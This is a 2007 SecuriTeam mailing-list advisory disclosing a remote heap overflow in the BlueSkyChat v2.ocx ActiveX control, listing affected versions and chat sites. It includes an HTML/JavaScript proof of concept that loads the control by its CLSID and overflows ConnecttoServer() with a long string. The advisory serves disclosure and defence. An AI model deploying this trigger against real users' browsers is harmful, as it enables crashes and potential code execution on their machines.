[NT] BlueSkyChat ActiveX Remote Heap Overflow vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



BlueSkyChat ActiveX Remote Heap Overflow vulnerability
------------------------------------------------------------------------


SUMMARY

<http://www.bluesky.cn/> BlueSkyChat is "a professional voice and video
chat software widely used by large chat websites in China". Remote
exploitation of a buffer overflow in an ActiveX control distributed with
Bluesky.cn could allow for the execution of arbitrary code.

DETAILS

Vulnerable Systems:
* BlueSkyChat version 8.1.2.0 (v2.ocx) and prior

When BlueSkyChat are installed, they register the following ActiveX
control on the system:

ProgId: V2.V2Ctrl.1
ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855
File: v2.ocx

This control contains a buffer overflow in its ConnecttoServer() method.

This is a client side vulnerability. So the clients of following chat
servers which install the affected BlueSkyChat software are affected.
* bliao http://www.bliao.com
* qqliao http://www.qqliao.com
* 7liao http://www.7liao.com
* haoliao http://www.haoliao.net
* 51liao http://chat.51liao.net
* heshang http://www.heshang.net
* xicn http://vchat.xicn.net
* CN104 http://www.cn104.com
* liao-tian http://www.liao-tian.com
* aliao http://www.aliao.net
* kuailiao http://www.kuailiao.com
* mtliao http://www.mtliao.com
* pj0427 http://www.pj0427.com
* uighur http://chat.uighur.cn
* wmliao http://www.wmliao.com

Exploit:
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;

var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:vulnhunt@xxxxxxxxx> Code
Audit Labs.
The original article can be found at:
<http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt> http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.